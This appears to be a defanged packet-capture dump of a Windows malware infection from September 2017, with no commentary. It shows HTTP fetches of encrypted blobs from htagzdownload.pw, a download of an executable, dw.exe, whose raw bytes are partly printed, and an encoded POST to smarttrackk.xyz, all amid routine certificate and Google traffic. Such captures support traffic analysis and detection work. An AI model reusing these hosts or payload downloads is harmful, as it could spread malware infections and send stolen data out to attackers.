uvBMfV9QBWwEf9M8p/7xyO0YAA kHXzVdtPZo34oKD9taQcUojPAaMhKwCGVzkxkCt3i1B
KNopL6G1fj8KT5ODZ3Y44HG6pOu 1xAwXLj z/cn6mjf298lKkfgDq9GTOYLwOZe/W90ZR
vtss3h7Vreo3mbZ3WC2m5chVUclN8NiItbbSeNHObiDHPEbJGiFPkaiHi4TTjS6aJlzdL6
fSJp2lHK6kQr4I31w7HwjkGvUSDXb1GuNnTr8p dibrSU3e4yDIhXuAmvfFXsrNWbBmWwH
MKHABwe3fjTSwNXLJQ1LgZ/gLeRPTjxrUIBjqAKUNGQvISJWy z7vYGrcNja7aYJOYuBLZ
zIEJs72wNedz7BU1wv4 EkQLoRtJe8skHHYXoRFe7SOcT3CG7jHkolyksF8b0gz2OE2uFw
EhEasNxzt4kJDlg6XvnaWczRdIxyekSTb/5RIt1LrbdPH7RT Vr6z8RBs4o5Y7EA3JIpSX
gttbb0ftBDu/ivxdIO4sSmF1 JYzWkY6WxahQwf4sbECRmXUf29xPZhAqfNPpi82dkQwnE
xGIEQGrH6Pdf4AIugHMNkUws9PQ y0KHmEPUR1tcFa8iJ5FmdZfmX9lMw0nN7oHEXePgGw
mrPcYu......0..HTTP/1.1 200 OK..Server: nginx/1.10.3 (Ubuntu)..Date: T
hu, 28 Sep 2017 03:12:10 GMT..Content-Type: text/html; charset=UTF-8..
Transfer-Encoding: chunked..Connection: keep-alive..30d.....cv/g6g6pYa
OuCPQQIXErWnJfaRcpz68Hg8SZMDO8/slNkc73T1DyVzyULnhIifeCNlLuaH h1BAz0ydG
rFEUTLc7U3 rWTJTPLBGnzPgu9J43zNsK7VqGNs6vbz0uZVj RSMuvBMfV9QBWwEf9M8p/
7xyO0YAA kHXzVdtPZo34oKD9taQcUojPAaMhKwCGVzkxkCt3i1BKNopL6G1fj8KT5ODZ3
Y44HG6pOu 1xAwXLj z/cn6mjf298lKkfgDq9GTOYLwOZe/W90ZRvtss3h7Vreo3mbZ3WC
2m5chVUclN8NiItbbSeNHObiDHPEbJGiFPkaiHi4TTjS6aJlzdL6fSJp2lHK6kQr4I31w7
HwjkGvUSDXb1GuNnTr8p dibrSU3e4yDIhXuAmvfFXsrNWbBmWwHMKHABwe3fjTSwNXLJQ
1LgZ/gLeRPTjxrUIBjqAKUNGQvISJWy z7vYGrcNja7aYJOYuBLZzIEJs72wNedz7BU1wv
4 EkQLoRtJe8skHHYXoRFe7SOcT3CG7jHkolyksF8b0gz2OE2uFwEhEasNxzt4kJDl

<<< skipped >>>

GET /Series/dracarysfisormek/2/goodchannel/UA.json HTTP/1.1

Host: htagzdownload.pw


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Thu, 28 Sep 2017 03:12:10 GMT

Content-Type: application/json

Content-Length: 40064

Last-Modified: Tue, 26 Sep 2017 11:19:02 GMT

Connection: keep-alive

ETag: "59ca37a6-9c80"

Accept-Ranges: bytes

eeNbj9dtHKieNW5/TNBNDfuLuXIJkX9aQ ppip8O2L0mBlMIxpsHYui/t TGHLJGscSzBe
em4MBqZnEIq5Evoqa69KO/sVV0TBRCMvo6mIPIcYFeIR2OYK0D5D6T95z Evp9mIDg33GR
eAXwqkvwBsj0U4j1M7hr39uDomn12v7PWFXk5isI5VKSxscJPW8Lqcu/64Kf8Vrq6e7 ty
BsEuLrqMyex4pLz69 gX35HQofB8SozFvmN1OQB93JsBBOISU0 n7TyUT/ciA/CpGmYUUz
RUCLTcv5jGOj6kFrmM7gl477nZm/zua6DQi2yln8lpET4u2ZJBuH40tNTgADkG4uhU31E9
VuClTaaddAAmO5doSGh4QqLpjPDsVJEam hGt7KbbiVBXen3PM4SDCW30fgDcJPUKNY9DO
/yGcsYu5Nvdq6jxXN88rugIaABdgaTlxfpO87HjOGvFeFR z0UvzK6FLTsanwTiM5w 3Wf
xqQfm5yYi9CYrqR2ThbyqYq2xlZO bJ9YvMiX0VRUOl6OsTLl3tI0OLYHfcVeShtJ1RzBJ
fuiET4r14ScDvaMMxZ12mtG/kKeAaI6aq3UwOQafluKKGLJ8tP0GfDc7Yji7G3KvliJM2n
klZ Ik2i7aj/dNqZaeu0LYT7BBr45fTfYF91mKTKIn8oczHi0DKNUXpi469POjadRMVZmT
RW5BRZsQmuqSO8MkTwBF6/zvNooLJmn7w4Jq08YePsA5RKOifQKeg/hO50g09gO/qUv3l 
V7g75uCyaAbm1ZwxYqgaXIzLrBG2zbXftdLeMOv7rpfCLd1J/sbkm6mZeNa2Z3TZr9xuFh
x7FvbTHDb0hA0q/W kHwqW7mV7p56dTDvb4nLKt5dthRCye63eRMqoUNU0FaNEOlNWzMb/
lmto3BhAHYTBpws4yZqBrGq8rOsMYfE/kXujYOPjdAA0DyAC0rUOiNl42jy/2q9LK lEpY
Ue8miydmEw8NXpxu 0q1YrJ8cTGivSCz7EcwRFfgbtIBsPsYiFuECSu3z/3jx7wFfHnSN6
ZrqLhry/KaerSl5hsHwzu43qjwB9 BTbEqSq4tFGrRkB7lDX1Lykuhx38hEgowG6Da3w8e
IY9NNMiScvk9Rs6NcfdY gj oncjCXxsUtDvG3gLO7/rMbeFWt0bx2 /noXgouH2bJmFP1
yGfl Gl1daJwX4d1IKxltQASQBgA2KW e8tNPhX701al6zA1QEc4biYfzOr4dZec0 Yy4n
mOqKOPB5KlxN0rie0O65Yg/H71KnElROUMayY2jza2L0diVAheLfLp09NSiEV7PgD1y6Ta
4LX8vZ5tKzum0yfzVYm62Sa2kEhKKD9JNalBujXKstu1HGP d4RlPodEis8yUJeGrIepAK
5StqPGnHxy/jd4NMJLAPkTAguNDnsM3rbBnQmGAXaJ08KjnJjVF3B wafZzUtV9gKIgcLZ
ciyY8LArZhHGCnSHWDQBsXHPCtSvT5Vc4qBL3j k40sDaa96dBcZgf0ql3r0zg5MGc

<<< skipped >>>

GET /Series/daenerystargaryen/2/goodchannel.json HTTP/1.1

Host: htagzdownload.pw


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Thu, 28 Sep 2017 03:12:11 GMT

Content-Type: application/json

Content-Length: 344

Last-Modified: Thu, 28 Sep 2017 03:00:01 GMT

Connection: keep-alive

ETag: "59cc65b1-158"

Accept-Ranges: bytes

gNkjKNnXnAo0G6hvTk4U02ja3t2JSvKcwkARMhymcGy7mX8k6cn6yyajvyF58pJ5Lllgsu
vTmX73mAOLk7vORdxMN/QxwFOsue9bWHJA bFoRrNHebH3uNlH2TDR7rGGE7g5gDyMwRUM
Xhzt6GufXumrOs1PKVCkn/x/Ftk/wBu8aQSTxeCZkvk4BEd4NbHtOxYYwdPmnENuV0C7 M
A3ibes8CiL47NWhsxRppWoQtgvBypfmmZClEV3Pi/qM711ekqZiUg12dY0P4zsnOi eYnB
gWz3rIkOz 5Vr8A3Bw2ktNHj9PZaIAi/j4 R3lEyynXy6sSVoKlkuJ EuxfxJA==..

GET /Download/Domain/dw.exe HTTP/1.0

Host: mydownloaddomain.com

User-Agent: InnoTools_Downloader


HTTP/1.1 200 OK

Server: nginx/1.10.0 (Ubuntu)

Content-Type: application/x-dosexec

Content-Length: 1611264

Connection: close

Cache-Control: public

Last-Modified: Wed, 27 Sep 2017 13:22:00 GMT

Content-Disposition: attachment; filename="dw.exe"

Accept-Ranges: bytes

Date: Thu, 28 Sep 2017 03:12:04 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...5..Y
................................. ... ....@.. ........................
............@.................................@...K.... ..............
................................................................. ....
........... ..H............text........ ...................... ..`.rsr
c........ ......................@..@.reloc............................
..@..B................p.......H........'..............@...............
.................................0..A....... .&. ....8....r...p(.... .
...8......~..........%..|.o......(....:R...& ....8%.................(.
...8*... ............E....!...........!.......1...8....& ....8.....(..
... ....8....~..... ....8......(,........&.....r...p(.....(....:K...& 
.....:....&r5..p(....8*... ............E............................8.
...& ....8....*.........".......... .&..*.. .&..*.> .&. .&..(....*.
 .&.~....:....rO..p.....(....o....s.........~....*.* .&.~....*.. .&...
....*: .&.....(....*.> .&......(....*. .&..*.. .&..*.* .&.~....*.&g
t; .&. .&..(....*v .&. .&.s....(....t.........*..: .&.....(....*.> 
.&......(....*. .&..*.. .&..*..0.......... .&..(....:....& ....82....:
S...8....& ....8....(....(....84... ............E.....................
...J... ....8.....(....(....%:....(....(...........%...(....& ....(...
.:....8....*.0..?....... .&..(....9M...& ....8.......s......i.......%.
.....i($......(%...(%... ....8_....(.....8....& ....8H...s....%.(!<<< skipped >>>

GET /pokermatch/podarok200/images/chip-3.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d5e948238bf9ca4a627bff0d0402cf1241499568697; expires=Mon, 09-Jul-18 02:51:37 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"595f9db6-a559"

Last-Modified: Fri, 07 Jul 2017 14:41:58 GMT

CF-Cache-Status: REVALIDATED

Expires: Mon, 09 Jul 2018 02:51:37 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37b7fb86f0e58442-KBP

Cache: HIT

X-Cached-Since: 2017-07-09T02:51:37 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-11T07:24:29 00:00

X-ID: m9-up-e242
a559...PNG........IHDR..............k......tEXtSoftware.Adobe ImageRea
dyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.c
om/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Resourc
eRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocument
ID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.di
d:24449FBD529111E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:24449FBC
529111E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015 (Wi
ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e406bbd8-b
32b-ad43-b177-c791ebe91eb7" stRef:documentID="adobe:docid:photoshop:84
bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> <
/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......oIDATx
......Wy6..);.wo.]..K.,Y.m..6....@LM.'_:$?..|.|.HH ...C.-.b.......%K..
v.t..n......93.3..J..d.{...;.f......0.4Q.@q.r1~...2.kh...K..f;.F.*....
:.$.....#4.i..y..^..hf..._W|I..R...:$.W....U..]..e.1.y......u...4..g..
...`U...K.F......:.-...ei........g....%N.8..p.............4?C...T.{..G
.B.Y.a....)..~.....p...A]..U.. ...m#...[..8:h~.v&l...*p..Xg...J...<
..C.QT...<....K.ss....w.....*p....y;.O...\.......C..*p...@.>X...
.XE..U.T..\.n....."..>.?Cy.BuT....O...&....N.o...VG.8.hp...i..D<<< skipped >>>

GET /?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ HTTP/1.1

Host: VVV.google.com.ua

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:09 GMT

Expires: -1

Cache-Control: private, max-age=0

Content-Type: text/html; charset=windows-1251

P3P: CP="This is not a P3P policy! See hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more info."

Server: gws

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Set-Cookie: NID=113=mFR7Y1eVLCdwhw4iZKztLv1vnS20DVN4PhRkvTsFQIoU1T2WwPQubZrV4ZprktTqGJ0B6PcfM38uzw_qkShCxx7Ie3FGC3KoIyIAT_lX6F8yKljkTbWffgLA8SYYtX0j; expires=Fri, 30-Mar-2018 03:12:09 GMT; path=/; domain=.google.com.ua; HttpOnly

Accept-Ranges: none

Vary: Accept-Encoding

Transfer-Encoding: chunked
8000..<!doctype html><html itemscope="" itemtype="hXXp://sche
ma.org/WebPage" lang="uk"><head><meta content="text/html; 
charset=UTF-8" http-equiv="Content-Type"><meta content="/images/
branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"
><title>Google</title><script>(function(){window.
google={kEI:'iWjMWePgK8LP6ATgjYPwCg',kEXPI:'755548,1353383,1354277,135
4403,1354750,1354875,1355203,1355210,1355217,1355324,1355597,3700264,3
700476,4029815,4031109,4043492,4045841,4048347,4063965,4072775,4076999
,4078430,4081039,4081164,4095910,4097153,4097470,4097922,4097929,40987
33,4098740,4098752,4102090,4102238,4103475,4103861,4104258,4104414,410
6084,4109316,4109489,4110656,4111590,4113217,4116724,4116731,4117328,4
117980,4118103,4118227,4118798,4119121,4119272,4119740,4119797,4119806
,4120415,4120660,4121035,4122025,4122184,4124091,4124174,4124411,41248
50,4125001,4125478,4125837,4125962,4126203,4126242,4126246,4127232,412
7473,4127657,4127744,4127775,4127890,4128586,4129001,4129304,4129520,4
129556,4129686,4130408,4130572,4130782,4130819,4131247,4131834,4131943
,4132254,4132263,4132310,4132618,4132702,4132783,4133098,4133114,10200
083,10200095,19003440,19003656,19003740,19003801,19003802,19003804,190
03808',authuser:0,kscs:'c9c918f0_41',u:'c9c918f0'};google.kHL='uk';})(
);(function(){google.lc=[];google.li=0;google.getEI=function(a){for(va
r b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;r
eturn b||google.kEI};google.getLEI=function(a){for(var b=null;a&&(<<< skipped >>>

GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:32 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=121571, public, no-transform, must-revalidate

Last-Modified: Thu, 28 Sep 2017 02:45:22 GMT

Expires: Fri, 29 Sep 2017 14:45:22 GMT

ETag: "192de15b904a49dcdaf0850804284d1c5035d7d7"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1777

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20170928024522Z0l0j0B0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,........2..rJ....20170928024522Z....2017092
9144522Z0...*.H................uI.=..&.3}. ...K....?y-..L-B..D.5..x...
..M..:,.e@'...L.A...\....LM.@ax....k{.\.............J.A..z4bN.R.......
fD=\..s.d.......$2...........N.f.?.cQ...u.....O......c].....Tc.W.$.& .
.u..4..P;.j....0.Z...2.....:........a./D.Q>'C)..........k...)m...6.
C9=-.pZ....0...0...0..........3....xXc0...*.H........0..1.0...U....US1
.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 
..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure 
Certificate Authority - G20...161213070000Z..171213070000Z0x1.0...U...
.US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0).
.U..."Go Daddy Validation Authority - G20.."0...*.H.............0.....
........}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9........_N."g
V..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.xt.v.UN...%.
...,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?...X...( ..z.
[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}..........0..0..
.U.......0.0...U...........0...U.%..0... .......0...U........J!~...}..
..^].....0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/re
pository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ...
....."hXXp://crl.godaddy.com/repository/0...*.H.............&...r.

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: isrg.trustid.ocsp.identrust.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 02:58:07 GMT

Content-transfer-encoding: Binary

last-modified: Wed, 27 Sep 2017 21:37:18 GMT

ETag: "196936375e8bf9b887f524c99b256c011efed3bd"

expires: Thu, 28 Sep 2017 21:37:18 GMT

cache-control: max-age=43200,public,no-transform,must-revalidate

Content-Type: application/ocsp-response

Content-Length: 1398
0..r......k0..g.. .....0.....X0..T0........ ..zJ.!.I...u(......2017092
7213718Z0s0q0I0... ........o.hMC..Hb... =G,../.......{,q...K.u...`....
...AB...S.sj.........20170927213718Z....20170928213718Z0...*.H........
.......t.......t.I.........f..Q].1..@....DF.M..h:x.4.`...I61....8=hS..
.......k.....u....#..&..>.#/m......J.B.q.....@...I1.q..c.\NY.....^l
../..k..e.&.L.T.n...>"......lU.....=aj..f.Cq_....E.a..#`q..y.'%K. .
.E..<.......b..c.......sO..."...`).".X.SV!....g1sN.p...).....0...0.
..0..{.........AB...[.s^*(R.40...*.H........0?1$0"..U....Digital Signa
ture Trust Co.1.0...U....DST Root CA X30...170510174115Z..180510174115
Z0..1.0...U....US1 0...U....Digital Signature Trust1.0...U....DST1.0..
.U....DST CA X3 OCSP Signer1$0"..*.H........pki-ops@IdenTrust.com0.."0
...*.H.............0.........C#......}.>.....r....P..%b.b....mh...O
....c.?..1_...O....9.K.6I.#O..6\..`..`~.5..&.!y....;..Y.Fcob.}....nz..
V.......F...{.2.4....AIt........s..lgQ..v...P7....)dk..`...../{..^N...
%-../-.z.|w.9..TFw.(...g....K=6..xr.B9..d{..Lf......T....t.........1ne
.7.t.........F0D0...U.......0.0...U...........0... .....0......0...U.%
..0... .......0...*.H..............p.A....o.....L.c.J.-5.h.nbE.r0\...)
3}..e.Lo.U.......&......l....$...........I...BI..Y.#..y(<h.?....i7.
..d...'k..A....H.$.6BP.*.o..\..`rh....oR.#..._}_.F.V..j..v>.}=Z.I..
O...QOr3.b.3.2.~ht./2t#d..M.}.?..T...$=....C...h....7F....2..]....'.P.
........M.@>.;.W..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8= HTTP/1.1

Cache-Control: max-age = 511667

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 04:57:34 GMT

If-None-Match: "57ff143e-1d7"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=172800

Content-Type: application/ocsp-response

Date: Thu, 28 Sep 2017 03:12:58 GMT

Etag: "59cc26af-1d7"

Expires: Sat, 30 Sep 2017 03:12:58 GMT

Last-Modified: Wed, 27 Sep 2017 22:31:11 GMT

Server: ECS (vie/F2D5)

X-Cache: HIT

Content-Length: 471
0..........0..... .....0......0...0.......>.i...G...&....cd ...2017
0926220000Z0s0q0I0... ............(..A...B..G@B.X....>.i...G...&...
.cd ........\..m. B.]......20170926220000Z....20171003220000Z0...*.H..
................A...]"..U....jd..;..}F.......>{Y..6.PC.i..RZ..C.=..
|........m.KYD..PH..._.$....;W..o.......).../...t1$.QR.?:...&.@..-T..}
...@....F...q....17.....J.......J...Lt....N....W.......:4e.veF.......@
 #UBX......`]..`....!.gg.@...M..p....|u.F..<d.m.|.^:...l.B..HTTP/1.
1 200 OK..Accept-Ranges: bytes..Cache-Control: max-age=172800..Content
-Type: application/ocsp-response..Date: Thu, 28 Sep 2017 03:12:58 GMT.
.Etag: "59cc26af-1d7"..Expires: Sat, 30 Sep 2017 03:12:58 GMT..Last-Mo
dified: Wed, 27 Sep 2017 22:31:11 GMT..Server: ECS (vie/F2D5)..X-Cache
: HIT..Content-Length: 471..0..........0..... .....0......0...0.......
>.i...G...&....cd ...20170926220000Z0s0q0I0... ............(..A...B
..G@B.X....>.i...G...&....cd ........\..m. B.]......20170926220000Z
....20171003220000Z0...*.H..................A...]"..U....jd..;..}F....
...>{Y..6.PC.i..RZ..C.=..|........m.KYD..PH..._.$....;W..o.......).
../...t1$.QR.?:...&.@..-T..}...@....F...q....17.....J.......J...Lt....
N....W.......:4e.veF.......@ #UBX......`]..`....!.gg.@...M..p....|u.F.
.<d.m.|.^:...l.B....<<< skipped >>>

POST /temptrack/Store HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: smarttrackk.xyz

Content-Length: 180

Expect: 100-continue

Accept-Encoding: gzip

HTTP/1.1 100 Continue

....

order="VoKGuJd2ELGGMv059EYoxqZWINs70rPNGd2GTkK3r8YEmtLK2bvAB63xputxkC 
/9Gzf6kcMG8qPhOOL/b3llkq8ocwhf708oA2E67  Veoihz9xA0ZhW1/x57DMHj7gv3XVG
qsRtkKsFp8djfLWzo9JGSl7uCgr3JtKjqUyITU="

HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Cache-Control: no-cache

X-RateLimit-Limit: 60

X-RateLimit-Remaining: 59

Date: Thu, 28 Sep 2017 03:12:08 GMT

Content-Encoding: gzip

14........................0..

GET /gdig2s1-455.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:26 GMT

Server: Apache

Last-Modified: Wed, 27 Sep 2017 03:30:24 GMT

ETag: "ca68-55a2369817400"

Accept-Ranges: bytes

Content-Length: 51816

Cache-Control: max-age=259200

Expires: Sun, 01 Oct 2017 03:12:26 GMT

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Connection: close

Content-Type: application/pkix-crl

0..d0..L...0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U...
.Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy
.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G2.
.170927033023Z..171004033023Z0..a0(....?....\...170330133457Z0.0...U..
.....0'..J&.Cb..X..170717173333Z0.0...U.......0(.......@.<...170331
144754Z0.0...U.......0(.....~.k7.k..170330221728Z0.0...U.......0'..8f.
ucG.*..170402013054Z0.0...U.......0(.....6h......170416202854Z0.0...U.
......0(......wy.KO..170602125026Z0.0...U.......0'....a.......17033122
5354Z0.0...U.......0(....5........170330221540Z0.0...U.......0'..|..r 
.....170420121854Z0.0...U.......0'..q/.....7..170415160054Z0.0...U....
...0(....7....I...170511172415Z0.0...U.......0(......w...Q..1705121700
15Z0.0...U.......0(.....k.5.....170526161215Z0.0...U.......0'..3..j..b
...170331161454Z0.0...U.......0(....QF..2.o..170401133354Z0.0...U.....
..0(......f.Y.D..170701215933Z0.0...U.......0'..GL....H...170530154626
Z0.0...U.......0'..h...`.-...170510152515Z0.0...U.......0(.....}..|4..
.170428021807Z0.0...U.......0(........>.4..170331202154Z0.0...U....
...0'..<.....R...170405145254Z0.0...U.......0'..X.]...L...170407165
054Z0.0...U.......0(......&i.d...170401121454Z0.0...U.......0'..5....3
7...170401062654Z0.0...U.......0'..d5....\k..170528171815Z0.0...U.....
..0(....j.I~.j...170331230754Z0.0...U.......0(.....C.......17033120105
4Z0.0...U.......0'..Z.H.`..o..170401201554Z0.0...U.......0'..{u.3..oG.
.170528012815Z0.0...U.......0(.....V.......170330170449Z0.0...U...

<<< skipped >>>

GET / HTTP/1.1

Host: VVV.google.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Referrer-Policy: no-referrer

Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ

Content-Length: 272

Date: Thu, 28 Sep 2017 03:12:09 GMT
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&dcr=0&ei=iW
jMWZLmJcLi8AfJxbrgDQ">here</A>...</BODY></HTML>..
HTTP/1.1 302 Found..Cache-Control: private..Content-Type: text/html; c
harset=UTF-8..Referrer-Policy: no-referrer..Location: hXXp://VVV.googl
e.com.ua/?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ..Content-Length: 2
72..Date: Thu, 28 Sep 2017 03:12:09 GMT..<HTML><HEAD><m
eta http-equiv="content-type" content="text/html;charset=utf-8">.&l
t;TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>
302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.goo
gle.com.ua/?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ">here
</A>...</BODY></HTML>....

GET /roots/dstrootcax3.p7c HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: apps.identrust.com


HTTP/1.1 200 OK

Date: Wed, 27 Sep 2017 23:18:14 GMT

Server: Apache

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

Last-Modified: Fri, 19 Oct 2012 20:08:11 GMT

Accept-Ranges: bytes

Content-Length: 893

Cache-control: max-age=86400

Content-Type: application/x-pkcs7-mime
0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D.....'..0
9...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U..
..DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital S
ignature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..
..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.
2....w..{........s.z..2..~..0....*8.y.1.P..e..Qc....a.Ka..Rk...K.(.H..
....>.... .[.*....p....%.tr.{j.4.0...h.{T.....Z...=d......Ap..r.&.8
U9C....\@..........%.......:..n.>..\..<..i....*.)W..=....]......
B0@0...U.......0....0...U...........0...U..........{,q...K.u...`...0..
.*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~
.....K. D.....}..j.....N...:.pI............:^H...X._..Z.......Y..n....
...f3.Y[....sG. ...7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G
..P.......dc`........}...=2.e..|.Wv...(9..e...w.j..w........).....55.1
.HTTP/1.1 200 OK..Date: Wed, 27 Sep 2017 23:18:14 GMT..Server: Apache.
.X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Last-Mo
dified: Fri, 19 Oct 2012 20:08:11 GMT..Accept-Ranges: bytes..Content-L
ength: 893..Cache-control: max-age=86400..Content-Type: application/x-
pkcs7-mime..0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.....
..D.....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust 
Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U.
...Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H....
.........0............P..W..be......,k0.[...}.@......3vI*.?!I..N..<<< skipped >>>

GET /pokermatch/podarok200/images/chip-1.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:52 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d0baa994c5496186f1338963226e1fc691499259662; expires=Thu, 05-Jul-18 13:01:02 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"595ce0dd-a527"

Last-Modified: Wed, 05 Jul 2017 12:51:41 GMT

CF-Cache-Status: MISS

Expires: Thu, 05 Jul 2018 13:01:02 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 379a82bce314824f-KBP

Cache: HIT

X-Cached-Since: 2017-07-05T13:01:02 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-05T14:03:45 00:00

X-ID: m9-up-e243
a527...PNG........IHDR................~....tEXtSoftware.Adobe ImageRea
dyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
